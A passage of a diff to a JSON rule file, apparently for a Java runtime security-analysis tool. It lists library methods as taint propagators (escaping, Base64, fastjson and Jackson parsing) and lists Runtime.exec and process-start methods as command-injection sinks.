"org.apache.commons.lang.StringEscapeUtils.escapeXml(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "xml-decoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.escapeXml(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-decoded" + ], + "target": "P1", + "track": "false", + "type": 1, + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-decoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-decoded" + ], + "target": "P1", + "track": "false", + "type": 1, + "untags": [ + "xml-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-decoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "xml-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml3(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml4(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "xml-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "xml-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml10(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "xml-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml11(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-decoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml3(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-decoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml4(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-decoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "xml-encoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeXml(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "xml-decoded" + ], + "value": "org.apache.taglibs.standard.tag.common.core.Util.escapeXml(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "apache-filter" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Decoder.decode(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "P2", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Decoder.decode(byte[],byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Decoder.decode(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Decoder.decode(java.nio.ByteBuffer)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decode(byte[],int,int,org.apache.commons.codec.binary.BaseNCodec$Context)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decodeBase64(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decodeBase64(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decodeInteger(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.decode(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "base64-dec" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Encoder.encode(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "P2", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Encoder.encode(byte[],byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Encoder.encode(java.nio.ByteBuffer)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "java.util.Base64$Encoder.encodeToString(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean,int)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[],int,int)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encode(java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encodeAsString(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "", + "type": 1, + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encodeToString(byte[])" + } + ], + "enable": 1, + "type": 1, + "value": "base64-enc" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.awt.Desktop.browse(java.net.URI)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,boolean)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,java.lang.ProcessBuilder$Redirect[],boolean)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[],java.io.File)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[],java.io.File)" + } + ], + "enable": 1, + "type": 4, + "value": "cmd-injection" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "P2", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.Object,com.alibaba.fastjson.parser.JSONLexer,com.alibaba.fastjson.parser.ParserConfig)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.String,com.alibaba.fastjson.parser.ParserConfig,int)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldBigInteger(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDate(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDecimal(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDouble(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray2(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldInt(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldIntArray(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldLong(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldString(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.scanFieldFloat(char[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "P4", + "track": "false", + "type": 1, + "untags": [], + "value": "com.alibaba.fastjson.util.IOUtils.decodeUTF8(byte[],int,int,char[])" + } + ], + "enable": 1, + "type": 1, + "value": "com.alibaba.fastjson" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(byte[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(byte[],int,int)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.DataInput)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.InputStream)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.Reader)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonParser.getBinaryValue(com.fasterxml.jackson.core.Base64Variant)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonParser.getCurrentName()" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonParser.getParsingContext()" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.fasterxml.jackson.core.JsonParser.getText()" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "", + "target": "P1", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Decoder.decode(byte[])" + "value": "com.fasterxml.jackson.core.JsonParser.getText(java.io.Writer)" }, { "command": "", @@ -3512,17 +5292,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "P2", - "track": "", + "target": "R", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Decoder.decode(byte[],byte[])" + "value": "com.fasterxml.jackson.core.JsonParser.getTextCharacters()" }, { "command": "", @@ -3530,17 +5310,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Decoder.decode(java.lang.String)" + "value": "com.fasterxml.jackson.core.JsonParser.getValueAsString()" }, { "command": "", @@ -3548,17 +5328,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Decoder.decode(java.nio.ByteBuffer)" + "value": "com.fasterxml.jackson.core.JsonParser.getValueAsString(java.lang.String)" }, { "command": "", @@ -3566,17 +5346,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decode(byte[],int,int,org.apache.commons.codec.binary.BaseNCodec$Context)" + "value": "com.fasterxml.jackson.core.JsonParser.nextFieldName()" }, { "command": "", @@ -3584,17 +5364,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decodeBase64(byte[])" + "value": "com.fasterxml.jackson.core.JsonParser.nextTextValue()" }, { "command": "", @@ -3602,17 +5382,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decodeBase64(java.lang.String)" + "value": "com.fasterxml.jackson.core.JsonStreamContext.getCurrentName()" }, { "command": "", @@ -3620,17 +5400,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decodeInteger(byte[])" + "value": "com.fasterxml.jackson.databind.JsonDeserializer.deserialize(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationContext)" }, { "command": "", @@ -3638,17 +5418,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.decode(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.asText()" }, { "command": "", @@ -3656,17 +5436,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.Object)" + "value": 